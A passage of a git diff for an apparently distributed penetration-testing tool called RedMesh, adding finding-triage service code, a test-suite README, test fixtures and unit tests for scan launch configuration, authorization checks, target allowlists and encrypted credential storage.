ui.get("top_findings", []) or []: + if not isinstance(finding, dict): + continue + triage = triage_map.get(finding.get("finding_id")) + if triage: + finding["triage"] = triage + return merged + + +def get_job_triage(owner, job_id: str, finding_id: str = ""): + triage_map = _job_repo(owner).list_job_triage(job_id) + if finding_id: + state = triage_map.get(finding_id) + audit = _job_repo(owner).get_finding_triage_audit(job_id, finding_id) + if state is None: + return {"job_id": job_id, "finding_id": finding_id, "found": False, "triage": None, "audit": audit} + return {"job_id": job_id, "finding_id": finding_id, "found": True, "triage": state, "audit": audit} + return {"job_id": job_id, "triage": triage_map} + + +def update_finding_triage(owner, job_id: str, finding_id: str, status: str, note: str = "", actor: str = "", review_at: float = 0): + if status not in VALID_TRIAGE_STATUSES: + return { + "error": "validation_error", + "message": f"Unsupported triage status: {status}. Allowed: {sorted(VALID_TRIAGE_STATUSES)}", + } + + job_specs = owner._get_job_from_cstore(job_id) + if not job_specs: + return {"error": "not_found", "message": f"Job {job_id} not found."} + if not job_specs.get("job_cid"): + return {"error": "not_available", "message": f"Job {job_id} is still running (triage requires archived findings)."} + + archive = _artifact_repo(owner).get_archive(job_specs) + if not isinstance(archive, dict): + return {"error": "fetch_failed", "message": f"Failed to fetch archive for job {job_id}."} + if not _archive_contains_finding(archive, finding_id): + return {"error": "not_found", "message": f"Finding {finding_id} not found in archived job {job_id}."} + + triage_state = FindingTriageState( + job_id=job_id, + finding_id=finding_id, + status=status, + note=note or "", + actor=actor or "", + updated_at=owner.time(), + review_at=review_at or None, + ) + repo = _job_repo(owner) + state_payload = repo.put_finding_triage(triage_state) + audit_payload = repo.append_finding_triage_audit(FindingTriageAuditEntry( + job_id=job_id, + finding_id=finding_id, + status=status, + note=note or "", + actor=actor or "", + timestamp=owner.time(), + )) + if hasattr(owner, "_log_audit_event"): + owner._log_audit_event("finding_triage_updated", { + "job_id": job_id, + "finding_id": finding_id, + "status": status, + "actor": actor or "", + }) + return { + "job_id": job_id, + "finding_id": finding_id, + "triage": state_payload, + "audit": audit_payload, + } + + +def get_job_archive_with_triage(owner, job_id: str): + job_specs = owner._get_job_from_cstore(job_id) + if not job_specs: + return {"error": "not_found", "message": f"Job {job_id} not found."} + + job_cid = job_specs.get("job_cid") + if not job_cid: + return {"error": "not_available", "message": f"Job {job_id} is still running (no archive yet)."} + + try: + archive = _artifact_repo(owner).get_archive_model(job_specs) + if archive is None: + return {"error": "fetch_failed", "message": f"Failed to fetch archive from R1FS (CID: {job_cid})."} + archive = archive.to_dict() + except ValueError as exc: + return { + "error": "unsupported_archive_version", + "message": str(exc), + "job_id": job_id, + "job_cid": job_cid, + } + + if archive.get("job_id") != job_id: + owner.P( + f"[INTEGRITY] Archive CID {job_cid} has job_id={archive.get('job_id')}, expected {job_id}", + color='r' + ) + return {"error": "integrity_mismatch", "message": "Archive job_id does not match requested job_id."} + + triage_map = _job_repo(owner).list_job_triage(job_id) + merged_archive = _merge_triage_into_archive_dict(archive, triage_map) + return {"job_id": job_id, "archive": merged_archive, "triage": triage_map} diff --git a/extensions/business/cybersec/red_mesh/tests/README.md b/extensions/business/cybersec/red_mesh/tests/README.md new file mode 100644 index 00000000..5cf522e2 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/README.md @@ -0,0 +1,49 @@ +# RedMesh Test Layers + +This suite is intentionally layered so refactors can target one architecture boundary at a time. + +## Repositories + +- `test_repositories.py` + +## Launch and Orchestration Services + +- `test_launch_service.py` +- `test_state_machine.py` +- `test_api.py` +- `test_integration.py` +- `test_regressions.py` + +## Workers and Graybox Runtime + +- `test_base_worker.py` +- `test_worker.py` +- `test_auth.py` +- `test_discovery.py` +- `test_safety.py` +- `test_target_config.py` + +## Probe Families + +- `test_probes.py` +- `test_probes_access.py` +- `test_probes_business.py` +- `test_probes_injection.py` +- `test_probes_misconfig.py` + +## Normalization and Contracts + +- `test_normalization.py` +- `test_graybox_finding.py` +- `test_jobconfig_webapp.py` +- `test_contracts.py` +- `test_hardening.py` + +## Suggested Layered Runs + +```bash +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_repositories.py +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_launch_service.py extensions/business/cybersec/red_mesh/tests/test_api.py extensions/business/cybersec/red_mesh/tests/test_integration.py extensions/business/cybersec/red_mesh/tests/test_regressions.py +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_worker.py extensions/business/cybersec/red_mesh/tests/test_auth.py extensions/business/cybersec/red_mesh/tests/test_discovery.py extensions/business/cybersec/red_mesh/tests/test_safety.py +PYTHONPATH=/home/vitalii/remote-dev/repos/edge_node pytest -q extensions/business/cybersec/red_mesh/tests/test_normalization.py extensions/business/cybersec/red_mesh/tests/test_graybox_finding.py extensions/business/cybersec/red_mesh/tests/test_contracts.py +``` diff --git a/extensions/business/cybersec/red_mesh/tests/__init__.py b/extensions/business/cybersec/red_mesh/tests/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/extensions/business/cybersec/red_mesh/tests/conftest.py b/extensions/business/cybersec/red_mesh/tests/conftest.py new file mode 100644 index 00000000..0cdfca42 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/conftest.py @@ -0,0 +1,60 @@ +import json +import sys +import struct +import unittest +from unittest.mock import MagicMock, patch + +from extensions.business.cybersec.red_mesh.worker import PentestLocalWorker + +from xperimental.utils import color_print + +MANUAL_RUN = False + + + +class DummyOwner: + def __init__(self): + self.messages = [] + + def P(self, message, **kwargs): + self.messages.append(message) + if MANUAL_RUN: + if "VULNERABILITY" in message: + color = 'r' + elif any(x in message for x in ["WARNING", "findings:"]): + color = 'y' + else: + color = 'd' + color_print(f"[DummyOwner] {message}", color=color) + return + + +def mock_plugin_modules(): + """Install mock modules so pentester_api_01 can be imported without naeural_core.""" + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return # Already imported successfully + + # Build a real class to avoid metaclass conflicts + def endpoint_decorator(*args, **kwargs): + if args and callable(args[0]): + return args[0] + def wrapper(fn): + return fn + return wrapper + + class FakeBasePlugin: + CONFIG = {'VALIDATION_RULES': {}} + endpoint = staticmethod(endpoint_decorator) + + mock_module = MagicMock() + mock_module.FastApiWebAppPlugin = FakeBasePlugin + + modules_to_mock = { + 'naeural_core': MagicMock(), + 'naeural_core.business': MagicMock(), + 'naeural_core.business.default': MagicMock(), + 'naeural_core.business.default.web_app': MagicMock(), + 'naeural_core.business.default.web_app.fast_api_web_app': mock_module, + } + for mod_name, mod in modules_to_mock.items(): + sys.modules.setdefault(mod_name, mod) diff --git a/extensions/business/cybersec/red_mesh/tests/test_api.py b/extensions/business/cybersec/red_mesh/tests/test_api.py new file mode 100644 index 00000000..39b750c8 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_api.py @@ -0,0 +1,2759 @@ +import json +import sys +import struct +import unittest +from unittest.mock import MagicMock, patch + +from extensions.business.cybersec.red_mesh.constants import JOB_ARCHIVE_VERSION, MAX_CONTINUOUS_PASSES +from extensions.business.cybersec.red_mesh.models import CStoreJobRunning + +from .conftest import DummyOwner, MANUAL_RUN, PentestLocalWorker, color_print, mock_plugin_modules + + +class TestPhase1ConfigCID(unittest.TestCase): + """Phase 1: Job Config CID — extract static config from CStore to R1FS.""" + + def test_config_cid_roundtrip(self): + """JobConfig.from_dict(config.to_dict()) preserves all fields.""" + from extensions.business.cybersec.red_mesh.models import JobConfig + + original = JobConfig( + target="example.com", + start_port=1, + end_port=1024, + exceptions=[22, 80], + distribution_strategy="SLICE", + port_order="SHUFFLE", + nr_local_workers=4, + enabled_features=["http_headers", "sql_injection"], + excluded_features=["brute_force"], + run_mode="SINGLEPASS", + scan_min_delay=0.1, + scan_max_delay=0.5, + ics_safe_mode=True, + redact_credentials=False, + scanner_identity="test-scanner", + scanner_user_agent="RedMesh/1.0", + task_name="Test Scan", + task_description="A test scan", + monitor_interval=300, + selected_peers=["peer1", "peer2"], + created_by_name="tester", + created_by_id="user-123", + authorized=True, + ) + d = original.to_dict() + restored = JobConfig.from_dict(d) + self.assertEqual(original, restored) + + def test_config_to_dict_has_required_fields(self): + """to_dict() includes target, start_port, end_port, run_mode.""" + from extensions.business.cybersec.red_mesh.models import JobConfig + + config = JobConfig( + target="10.0.0.1", + start_port=1, + end_port=65535, + exceptions=[], + distribution_strategy="SLICE", + port_order="SEQUENTIAL", + nr_local_workers=2, + enabled_features=[], + excluded_features=[], + run_mode="CONTINUOUS_MONITORING", + ) + d = config.to_dict() + self.assertEqual(d["target"], "10.0.0.1") + self.assertEqual(d["start_port"], 1) + self.assertEqual(d["end_port"], 65535) + self.assertEqual(d["run_mode"], "CONTINUOUS_MONITORING") + + def test_config_strip_none(self): + """_strip_none removes None values from serialized config.""" + from extensions.business.cybersec.red_mesh.models import JobConfig + + config = JobConfig( + target="example.com", + start_port=1, + end_port=100, + exceptions=[], + distribution_strategy="SLICE", + port_order="SEQUENTIAL", + nr_local_workers=2, + enabled_features=[], + excluded_features=[], + run_mode="SINGLEPASS", + selected_peers=None, + ) + d = config.to_dict() + self.assertNotIn("selected_peers", d) + + @classmethod + def _mock_plugin_modules(cls): + mock_plugin_modules() + + @classmethod + def _build_mock_plugin(cls, job_id="test-job", time_val=1000000.0, r1fs_cid="QmFakeConfigCID"): + """Build a mock plugin instance for launch_test testing.""" + plugin = MagicMock() + plugin.ee_addr = "node-1" + plugin.ee_id = "node-alias-1" + plugin.cfg_instance_id = "test-instance" + plugin.cfg_redmesh_secret_store_key = "unit-test-redmesh-secret-key" + plugin.cfg_port_order = "SEQUENTIAL" + plugin.cfg_excluded_features = [] + plugin.cfg_distribution_strategy = "SLICE" + plugin.cfg_run_mode = "SINGLEPASS" + plugin.cfg_monitor_interval = 60 + plugin.cfg_scanner_identity = "" + plugin.cfg_scanner_user_agent = "" + plugin.cfg_nr_local_workers = 2 + plugin.cfg_scan_target_allowlist = [] + plugin.cfg_network_concurrency_warning_threshold = 16 + plugin.cfg_graybox_budgets = { + "AUTH_ATTEMPTS": 10, + "ROUTE_DISCOVERY": 100, + "STATEFUL_ACTIONS": 1, + } + plugin.cfg_llm_agent = {"ENABLED": False} + plugin.cfg_ics_safe_mode = False + plugin.cfg_scan_min_rnd_delay = 0 + plugin.cfg_scan_max_rnd_delay = 0 + plugin.uuid.return_value = job_id + plugin.time.return_value = time_val + plugin.json_dumps.return_value = "{}" + plugin.r1fs = MagicMock() + plugin.r1fs.add_json.return_value = r1fs_cid + plugin.chainstore_hset = MagicMock() + plugin.chainstore_hgetall.return_value = {} + plugin.chainstore_peers = ["node-1"] + plugin.cfg_chainstore_peers = ["node-1"] + plugin._redact_job_config = staticmethod(lambda d: d) + plugin._validate_feature_catalog = MagicMock() + return plugin + + @classmethod + def _bind_launch_helpers(cls, plugin): + """Bind real launch helper methods onto a MagicMock plugin host.""" + cls._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin._coerce_scan_type = lambda scan_type=None: PentesterApi01Plugin._coerce_scan_type(plugin, scan_type) + plugin._validation_error = lambda message: PentesterApi01Plugin._validation_error(plugin, message) + plugin._parse_exceptions = lambda exceptions: PentesterApi01Plugin._parse_exceptions(plugin, exceptions) + plugin._get_supported_features = lambda scan_type=None, categs=False: PentesterApi01Plugin._get_supported_features( + plugin, scan_type=scan_type, categs=categs + ) + plugin._get_all_features = lambda categs=False, scan_type=None: PentesterApi01Plugin._get_all_features( + plugin, categs=categs, scan_type=scan_type + ) + plugin._get_feature_catalog = lambda scan_type=None: PentesterApi01Plugin._get_feature_catalog(plugin, scan_type) + plugin._resolve_enabled_features = lambda excluded, scan_type="network": ( + PentesterApi01Plugin._resolve_enabled_features(plugin, excluded, scan_type=scan_type) + ) + plugin._resolve_active_peers = lambda selected: PentesterApi01Plugin._resolve_active_peers(plugin, selected) + plugin._normalize_common_launch_options = lambda **kwargs: PentesterApi01Plugin._normalize_common_launch_options( + plugin, **kwargs + ) + plugin._build_network_workers = lambda active_peers, start_port, end_port, distribution_strategy: ( + PentesterApi01Plugin._build_network_workers(plugin, active_peers, start_port, end_port, distribution_strategy) + ) + plugin._build_webapp_workers = lambda active_peers, target_port: ( + PentesterApi01Plugin._build_webapp_workers(plugin, active_peers, target_port) + ) + plugin._announce_launch = lambda **kwargs: PentesterApi01Plugin._announce_launch(plugin, **kwargs) + plugin.launch_network_scan = lambda **kwargs: PentesterApi01Plugin.launch_network_scan(plugin, **kwargs) + plugin.launch_webapp_scan = lambda **kwargs: PentesterApi01Plugin.launch_webapp_scan(plugin, **kwargs) + return plugin + + @classmethod + def _extract_job_specs(cls, plugin, job_id): + """Extract the job_specs dict from chainstore_hset calls.""" + for call in plugin.chainstore_hset.call_args_list: + kwargs = call[1] if call[1] else {} + if kwargs.get("key") == job_id: + return kwargs["value"] + return None + + def _launch(self, plugin, **kwargs): + """Call launch_test with mocked base modules.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + self._bind_launch_helpers(plugin) + defaults = dict(target="example.com", start_port=1, end_port=1024, exceptions="", authorized=True) + defaults.update(kwargs) + return PentesterApi01Plugin.launch_test(plugin, **defaults) + + def _launch_network(self, plugin, **kwargs): + """Call launch_network_scan with mocked base modules.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + self._bind_launch_helpers(plugin) + defaults = dict(target="example.com", start_port=1, end_port=1024, exceptions="", authorized=True) + defaults.update(kwargs) + return PentesterApi01Plugin.launch_network_scan(plugin, **defaults) + + def _launch_webapp(self, plugin, **kwargs): + """Call launch_webapp_scan with mocked base modules.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + self._bind_launch_helpers(plugin) + defaults = dict( + target_url="https://example.com/app", + official_username="admin", + official_password="secret", + authorized=True, + ) + defaults.update(kwargs) + return PentesterApi01Plugin.launch_webapp_scan(plugin, **defaults) + + def test_launch_builds_job_config_and_stores_cid(self): + """launch_test() builds JobConfig, saves to R1FS, stores job_config_cid in CStore.""" + plugin = self._build_mock_plugin(job_id="test-job-1", r1fs_cid="QmFakeConfigCID123") + self._launch(plugin) + + # Verify r1fs.add_json was called with a JobConfig dict + self.assertTrue(plugin.r1fs.add_json.called) + config_dict = plugin.r1fs.add_json.call_args_list[0][0][0] + self.assertEqual(config_dict["target"], "example.com") + self.assertEqual(config_dict["start_port"], 1) + self.assertEqual(config_dict["end_port"], 1024) + self.assertIn("run_mode", config_dict) + + # Verify CStore has job_config_cid + job_specs = self._extract_job_specs(plugin, "test-job-1") + self.assertIsNotNone(job_specs, "Expected chainstore_hset call for job_specs") + self.assertEqual(job_specs["job_config_cid"], "QmFakeConfigCID123") + + def test_cstore_has_no_static_config(self): + """After launch, CStore object has no exceptions, distribution_strategy, etc.""" + plugin = self._build_mock_plugin(job_id="test-job-2") + self._launch(plugin) + + job_specs = self._extract_job_specs(plugin, "test-job-2") + self.assertIsNotNone(job_specs) + + # These static config fields must NOT be in CStore + removed_fields = [ + "exceptions", "distribution_strategy", "enabled_features", + "excluded_features", "scan_min_delay", "scan_max_delay", + "ics_safe_mode", "redact_credentials", "scanner_identity", + "scanner_user_agent", "nr_local_workers", "task_description", + "monitor_interval", "selected_peers", "created_by_name", + "created_by_id", "authorized", "port_order", + ] + for field in removed_fields: + self.assertNotIn(field, job_specs, f"CStore should not contain '{field}'") + + def test_cstore_has_listing_fields(self): + """CStore has target, task_name, start_port, end_port, date_created.""" + plugin = self._build_mock_plugin(job_id="test-job-3", time_val=1700000000.0) + self._launch(plugin, start_port=80, end_port=443, task_name="Web Scan") + + job_specs = self._extract_job_specs(plugin, "test-job-3") + self.assertIsNotNone(job_specs) + + self.assertEqual(job_specs["target"], "example.com") + self.assertEqual(job_specs["task_name"], "Web Scan") + self.assertEqual(job_specs["start_port"], 80) + self.assertEqual(job_specs["end_port"], 443) + self.assertEqual(job_specs["date_created"], 1700000000.0) + self.assertEqual(job_specs["risk_score"], 0) + + def test_pass_reports_initialized_empty(self): + """CStore has pass_reports: [] (no pass_history).""" + plugin = self._build_mock_plugin(job_id="test-job-4") + self._launch(plugin, start_port=1, end_port=100) + + job_specs = self._extract_job_specs(plugin, "test-job-4") + self.assertIsNotNone(job_specs) + + self.assertIn("pass_reports", job_specs) + self.assertEqual(job_specs["pass_reports"], []) + self.assertNotIn("pass_history", job_specs) + + def test_launch_fails_if_r1fs_unavailable(self): + """If R1FS fails to store config, launch aborts with error.""" + plugin = self._build_mock_plugin(job_id="test-job-5", r1fs_cid=None) + result = self._launch(plugin, start_port=1, end_port=100) + + self.assertIn("error", result) + # CStore should NOT have been written with the job + job_specs = self._extract_job_specs(plugin, "test-job-5") + self.assertIsNone(job_specs) + + def test_launch_webapp_scan_uses_mirrored_worker_assignments(self): + """Webapp launches assign the same resolved target port to every selected peer.""" + plugin = self._build_mock_plugin(job_id="test-job-webapp") + plugin.chainstore_peers = ["node-1", "node-2"] + plugin.cfg_chainstore_peers = ["node-1", "node-2"] + + result = self._launch_webapp(plugin, selected_peers=["node-1", "node-2"]) + self.assertNotIn("error", result) + + job_specs = self._extract_job_specs(plugin, "test-job-webapp") + workers = job_specs["workers"] + self.assertEqual(workers["node-1"]["start_port"], 443) + self.assertEqual(workers["node-1"]["end_port"], 443) + self.assertEqual(workers["node-2"]["start_port"], 443) + self.assertEqual(workers["node-2"]["end_port"], 443) + + def test_launch_webapp_scan_neutralizes_network_only_fields(self): + """Webapp config does not persist bogus network defaults like exceptions='64297'.""" + plugin = self._build_mock_plugin(job_id="test-job-webcfg") + self._launch_webapp(plugin) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["scan_type"], "webapp") + self.assertEqual(config_dict["exceptions"], []) + self.assertEqual(config_dict["distribution_strategy"], "MIRROR") + self.assertEqual(config_dict["nr_local_workers"], 1) + self.assertEqual(config_dict["target_url"], "https://example.com/app") + + def test_launch_webapp_scan_persists_secret_ref_not_inline_passwords(self): + """Webapp launch stores a separate secret blob and persists only secret_ref in JobConfig.""" + plugin = self._build_mock_plugin(job_id="test-job-websecret") + plugin.r1fs.add_json.side_effect = ["QmSecretCID", "QmConfigCID"] + + result = self._launch_webapp( + plugin, + official_username="admin", + official_password="secret", + regular_username="user", + regular_password="pass", + weak_candidates=["admin:admin"], + ) + + self.assertNotIn("error", result) + self.assertEqual(len(plugin.r1fs.add_json.call_args_list), 2) + + secret_doc = plugin.r1fs.add_json.call_args_list[0][0][0] + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + secret_kwargs = plugin.r1fs.add_json.call_args_list[0][1] + + self.assertEqual(secret_doc["kind"], "redmesh_graybox_credentials") + self.assertEqual(secret_doc["storage_mode"], "encrypted_r1fs_json_v1") + self.assertEqual(secret_doc["payload"]["official_password"], "secret") + self.assertEqual(secret_doc["payload"]["regular_password"], "pass") + self.assertEqual(secret_doc["payload"]["weak_candidates"], ["admin:admin"]) + self.assertEqual(secret_kwargs["secret"], "unit-test-redmesh-secret-key") + + self.assertEqual(config_dict["secret_ref"], "QmSecretCID") + self.assertEqual(config_dict["official_username"], "") + self.assertEqual(config_dict["official_password"], "") + self.assertEqual(config_dict["regular_username"], "") + self.assertEqual(config_dict["regular_password"], "") + self.assertNotIn("weak_candidates", config_dict) + self.assertTrue(config_dict["has_regular_credentials"]) + self.assertTrue(config_dict["has_weak_candidates"]) + + job_specs = self._extract_job_specs(plugin, "test-job-websecret") + self.assertEqual(job_specs["job_config_cid"], "QmConfigCID") + + def test_launch_webapp_scan_rejects_secret_persistence_without_store_key(self): + """Webapp launch fails closed when no strong secret-store key is configured.""" + plugin = self._build_mock_plugin(job_id="test-job-websecret-nokey") + plugin.cfg_redmesh_secret_store_key = "" + plugin.cfg_comms_host_key = "" + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 86400, "RETRIES": 2} + + result = self._launch_webapp( + plugin, + official_username="admin", + official_password="secret", + ) + + self.assertEqual(result["error"], "Failed to store job config in R1FS") + self.assertEqual(len(plugin.r1fs.add_json.call_args_list), 0) + + def test_launch_webapp_scan_rejects_missing_target_url(self): + """Webapp endpoint returns structured validation error for missing URL.""" + plugin = self._build_mock_plugin(job_id="test-job-weberr") + result = self._launch_webapp(plugin, target_url="") + self.assertEqual(result["error"], "validation_error") + self.assertIn("target_url", result["message"]) + + def test_launch_webapp_scan_rejects_invalid_url_scheme(self): + """Webapp endpoint rejects malformed or non-http(s) targets.""" + plugin = self._build_mock_plugin(job_id="test-job-webbadurl") + result = self._launch_webapp(plugin, target_url="ftp://example.com/app") + self.assertEqual(result["error"], "validation_error") + self.assertIn("http/https", result["message"]) + + def test_launch_network_scan_requires_authorization_with_structured_error(self): + """Network endpoint returns validation_error when authorization is missing.""" + plugin = self._build_mock_plugin(job_id="test-job-noauth") + result = self._launch_network(plugin, authorized=False) + self.assertEqual(result["error"], "validation_error") + self.assertIn("authorization", result["message"].lower()) + + def test_launch_network_scan_rejects_target_confirmation_mismatch(self): + """Target confirmation must echo the resolved target host.""" + plugin = self._build_mock_plugin(job_id="test-job-confirm") + result = self._launch_network(plugin, target="example.com", target_confirmation="other.example.com", authorized=True) + self.assertEqual(result["error"], "validation_error") + self.assertIn("target_confirmation", result["message"]) + + def test_launch_webapp_scan_enforces_target_allowlist(self): + """Webapp targets outside the allowlist are rejected before launch.""" + plugin = self._build_mock_plugin(job_id="test-job-allowlist") + result = self._launch_webapp( + plugin, + target_url="https://example.com/app", + target_allowlist=["internal.example.org"], + ) + self.assertEqual(result["error"], "validation_error") + self.assertIn("allowlist", result["message"]) + + def test_launch_webapp_scan_persists_authorization_context(self): + """Authorization metadata is stored in immutable job config and audit context.""" + plugin = self._build_mock_plugin(job_id="test-job-authctx") + plugin._log_audit_event = MagicMock() + + self._launch_webapp( + plugin, + target_confirmation="example.com", + scope_id="scope-123", + authorization_ref="TICKET-42", + engagement_metadata={"ticket": "TICKET-42", "owner": "alice"}, + target_allowlist=["example.com", "/api/"], + target_config={"discovery": {"scope_prefix": "/api/"}}, + ) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["target_confirmation"], "example.com") + self.assertEqual(config_dict["scope_id"], "scope-123") + self.assertEqual(config_dict["authorization_ref"], "TICKET-42") + self.assertEqual(config_dict["engagement_metadata"]["owner"], "alice") + self.assertEqual(config_dict["target_allowlist"], ["example.com", "/api/"]) + audit_payload = plugin._log_audit_event.call_args[0][1] + self.assertEqual(audit_payload["scope_id"], "scope-123") + self.assertEqual(audit_payload["authorization_ref"], "TICKET-42") + + def test_launch_webapp_scan_applies_safety_policy_caps(self): + """Graybox launch policy caps weak-auth and discovery budgets and records warnings.""" + plugin = self._build_mock_plugin(job_id="test-job-policy") + plugin.cfg_graybox_budgets = { + "AUTH_ATTEMPTS": 3, + "ROUTE_DISCOVERY": 20, + "STATEFUL_ACTIONS": 0, + } + + self._launch_webapp( + plugin, + max_weak_attempts=9, + allow_stateful_probes=True, + verify_tls=False, + target_config={"discovery": {"scope_prefix": "/api/", "max_pages": 50}}, + ) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["max_weak_attempts"], 3) + self.assertEqual(config_dict["target_config"]["discovery"]["max_pages"], 20) + self.assertFalse(config_dict["allow_stateful_probes"]) + warnings = config_dict["safety_policy"]["warnings"] + self.assertTrue(any("capped" in warning for warning in warnings)) + self.assertTrue(any("TLS verification is disabled" in warning for warning in warnings)) + + def test_launch_test_rejects_invalid_scan_type(self): + """Compatibility endpoint rejects unknown scan types with a structured error.""" + plugin = self._build_mock_plugin(job_id="test-job-badtype") + result = self._launch(plugin, scan_type="invalid-scan-type") + self.assertEqual(result["error"], "validation_error") + self.assertIn("Invalid scan_type", result["message"]) + + def test_launch_test_routes_to_scan_type_specific_endpoint(self): + """Compatibility launch_test routes to network/webapp launch methods.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = MagicMock() + plugin.launch_network_scan = MagicMock(return_value={"route": "network"}) + plugin.launch_webapp_scan = MagicMock(return_value={"route": "webapp"}) + + network = PentesterApi01Plugin.launch_test(plugin, target="example.com", authorized=True, scan_type="network") + webapp = PentesterApi01Plugin.launch_test( + plugin, + target="example.com", + target_url="https://example.com/app", + official_username="admin", + official_password="secret", + authorized=True, + scan_type="webapp", + ) + + self.assertEqual(network["route"], "network") + self.assertEqual(webapp["route"], "webapp") + plugin.launch_network_scan.assert_called_once() + plugin.launch_webapp_scan.assert_called_once() + + def test_launch_webapp_scan_persists_graybox_enabled_features_only(self): + """Webapp launches resolve enabled features from the graybox capability set only.""" + plugin = self._build_mock_plugin(job_id="test-job-webfeatures") + self._launch_webapp(plugin, excluded_features=["_graybox_injection"]) + + config_dict = plugin.r1fs.add_json.call_args_list[1][0][0] + self.assertEqual(config_dict["excluded_features"], ["_graybox_injection"]) + self.assertIn("_graybox_access_control", config_dict["enabled_features"]) + self.assertIn("_graybox_weak_auth", config_dict["enabled_features"]) + self.assertNotIn("_graybox_injection", config_dict["enabled_features"]) + self.assertFalse(any(method.startswith("_service_info_") for method in config_dict["enabled_features"])) + self.assertFalse(any(method.startswith("_web_test_") for method in config_dict["enabled_features"])) + + +class TestPhase4FeatureCatalog(unittest.TestCase): + """Phase 4: feature catalog and scan-type capability modeling.""" + + @classmethod + def _mock_plugin_modules(cls): + mock_plugin_modules() + + def _build_plugin(self): + plugin = MagicMock() + plugin.json_dumps = staticmethod(json.dumps) + plugin.P = MagicMock() + return TestPhase1ConfigCID._bind_launch_helpers(plugin) + + def test_get_all_features_filters_by_scan_type(self): + """Capability discovery is scan-type-aware.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = self._build_plugin() + network = PentesterApi01Plugin._get_all_features(plugin, scan_type="network") + webapp = PentesterApi01Plugin._get_all_features(plugin, scan_type="webapp") + merged = PentesterApi01Plugin._get_all_features(plugin) + + self.assertIn("_service_info_http", network) + self.assertIn("_post_scan_correlate", network) + self.assertNotIn("_graybox_access_control", network) + self.assertIn("_graybox_access_control", webapp) + self.assertNotIn("_service_info_http", webapp) + self.assertIn("_graybox_access_control", merged) + self.assertIn("_service_info_http", merged) + + def test_get_feature_catalog_filters_graybox_category(self): + """Catalog filtering returns only graybox entries for webapp scans.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = self._build_plugin() + response = PentesterApi01Plugin.get_feature_catalog(plugin, scan_type="webapp") + + self.assertEqual([item["category"] for item in response["catalog"]], ["graybox"]) + self.assertIn("_graybox_access_control", response["all_methods"]) + self.assertNotIn("_service_info_http", response["all_methods"]) + + def test_validate_feature_catalog_rejects_missing_worker_methods(self): + """Startup validation fails loudly when catalog methods are not executable.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = self._build_plugin() + bad_catalog = [ + { + "id": "graybox", + "label": "Graybox", + "description": "Broken", + "category": "graybox", + "methods": ["_graybox_missing_method"], + } + ] + + with patch( + "extensions.business.cybersec.red_mesh.pentester_api_01.FEATURE_CATALOG", + bad_catalog, + ): + with self.assertRaises(RuntimeError): + PentesterApi01Plugin._validate_feature_catalog(plugin) + + def test_network_features_come_from_explicit_registry(self): + """Network feature discovery stays tied to the explicit registry order.""" + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.worker.pentest_worker import PentestLocalWorker + from extensions.business.cybersec.red_mesh.constants import NETWORK_FEATURE_METHODS, NETWORK_FEATURE_REGISTRY + + self.assertEqual(PentestLocalWorker.get_supported_features(), list(NETWORK_FEATURE_METHODS)) + self.assertEqual(PentestLocalWorker.get_supported_features(categs=True), { + category: list(methods) + for category, methods in NETWORK_FEATURE_REGISTRY.items() + }) + + + +class TestPhase2PassFinalization(unittest.TestCase): + """Phase 2: Single Aggregation + Consolidated Pass Reports.""" + + @classmethod + def _mock_plugin_modules(cls): + """Install mock modules so pentester_api_01 can be imported without naeural_core.""" + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _build_finalize_plugin(self, job_id="test-job", job_pass=1, run_mode="SINGLEPASS", + llm_enabled=False, r1fs_returns=None): + """Build a mock plugin pre-configured for _maybe_finalize_pass testing.""" + plugin = MagicMock() + plugin.ee_addr = "launcher-node" + plugin.ee_id = "launcher-alias" + plugin.cfg_instance_id = "test-instance" + plugin.cfg_llm_agent = { + "ENABLED": llm_enabled, + "TIMEOUT": 30, + "AUTO_ANALYSIS_TYPE": "security_assessment", + } + plugin.cfg_llm_agent_api_host = "localhost" + plugin.cfg_llm_agent_api_port = 8080 + plugin.cfg_monitor_interval = 60 + plugin.cfg_monitor_jitter = 0 + plugin.cfg_attestation = {"ENABLED": True, "PRIVATE_KEY": "", "MIN_SECONDS_BETWEEN_SUBMITS": 300, "RETRIES": 2} + plugin.time.return_value = 1000100.0 + plugin.json_dumps.return_value = "{}" + + # R1FS mock + plugin.r1fs = MagicMock() + cid_counter = {"n": 0} + def fake_add_json(data, show_logs=True): + cid_counter["n"] += 1 + if r1fs_returns is not None: + return r1fs_returns.get(cid_counter["n"], 